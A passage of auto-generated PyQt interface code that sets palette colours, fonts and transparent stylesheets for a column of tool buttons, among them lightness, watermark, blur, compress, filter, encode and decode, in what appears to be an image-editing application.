palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_lightness.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_lightness.setFont(font)
self.btn_lightness.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_lightness.setObjectName("btn_lightness")
self.verticalLayout_2.addWidget(self.btn_lightness)
self.btn_watermark = QtWidgets.QToolButton(self.frame_5)
self.btn_watermark.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_watermark.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_watermark.setFont(font)
self.btn_watermark.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_watermark.setObjectName("btn_watermark")
self.verticalLayout_2.addWidget(self.btn_watermark, 0, QtCore.Qt.AlignLeft)
self.btn_blur = QtWidgets.QToolButton(self.frame_5)
self.btn_blur.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_blur.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_blur.setFont(font)
self.btn_blur.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_blur.setObjectName("btn_blur")
self.verticalLayout_2.addWidget(self.btn_blur)
self.btn_compress = QtWidgets.QToolButton(self.frame_5)
self.btn_compress.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_compress.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_compress.setFont(font)
self.btn_compress.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_compress.setObjectName("btn_compress")
self.verticalLayout_2.addWidget(self.btn_compress)
self.btn_filter = QtWidgets.QToolButton(self.frame_5)
self.btn_filter.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_filter.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_filter.setFont(font)
self.btn_filter.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_filter.setObjectName("btn_filter")
self.verticalLayout_2.addWidget(self.btn_filter)
self.btn_encode = QtWidgets.QToolButton(self.frame_5)
self.btn_encode.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_encode.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_encode.setFont(font)
self.btn_encode.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_encode.setObjectName("btn_encode")
self.verticalLayout_2.addWidget(self.btn_encode)
self.btn_decode = QtWidgets.QToolButton(self.frame_5)
self.btn_decode.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
